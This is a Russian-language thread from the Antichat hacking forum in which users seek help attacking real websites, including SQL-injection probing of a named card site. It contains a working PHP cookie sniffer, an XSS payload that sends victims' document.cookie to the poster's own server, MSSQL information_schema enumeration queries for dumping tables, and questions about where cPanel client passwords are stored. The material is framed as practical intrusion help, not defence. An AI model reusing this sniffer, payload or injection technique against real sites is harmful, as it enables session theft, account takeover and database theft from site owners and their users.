ANTICHAT — форум по информационной безопасности, OSINT и технологиям

а точнее здесь:
https://forum.antichat.ru/thread40576.html

htt p://cardz.ru/index.php?rasd=oplata&type=1'
Можете посмотреть эту скуля или нет , а то не могу понять!

Sosok, нет, не скуля.
при скуле будет немного другая ошибка.

Sosok, это ошибка в самом скрипте, она не вызвана кавычкой...
http://cardz.ru/index.php?rasd=oplata&type=1
=
http://cardz.ru/index.php?rasd=oplata&type=1'

Начёт сниффера.Код взял с форума:

<?php


$date = date('d.m.y - H:i:s');
$ip = UrlDecode(getenv('REMOTE_ADDR'));
$referer = UrlDecode(getenv('HTTP_REFERER'));
$query = UrlDecode(getenv('QUERY_STRING'));
$cookie=getenv('HTTP_COOKIE');

$s = fopen("C:\Program Files\VertrigoServ\www\cookies.txt","w");

if($s) {

echo "Successfully opened!";
fputs($s,$cookie);
echo "\n";
fputs($s,$ip);

}

else {

echo "У нас праблемы...";

}


?>

Также есть XSS на одном сайте.Как нужно обратиться к скрипту,чтобы он записал данные ?

"<script%0A%0D>s=new Image();s.src="http://my_ip/sniffer.php?"+document.cookie%3B</script>

Где my_ip - мой Ip адрес).На серве лежит скрипт sniffer.php. В фаил ничего не записалось,вот я и подумал,что обращаюсь к скрипту неправильно.

при составлении запроса в mssql inj приходится сначала кодировать в чар а потом с помощью урл код)) естественно чтоб узнать все таблы запрос будет длинным.. и обрезается(( как поступить?

кто знает где пассы клиентов в cPanel .. или каждый хостер делает свое?

SELECT TOP 1 TABLE_NAME FROM inofrmation_schema.TABLES WHERE TABLE_NAME NOT IN(SELECT TOP x++ TABLE_NAME FROM inofrmation_schema.TABLES ORDER BY TABLE_NAME) ORDER BY TABLE_NAME

__________________
<? Raz0r.name — блог о web-безопасности

2razor
работает) но как можно по аналогии вытащить имена колонок?)
и если выводит данные из таблицы ... where id=2... почему запрос проходит без ошибок? или какие еще способы есть сдампить удаленно?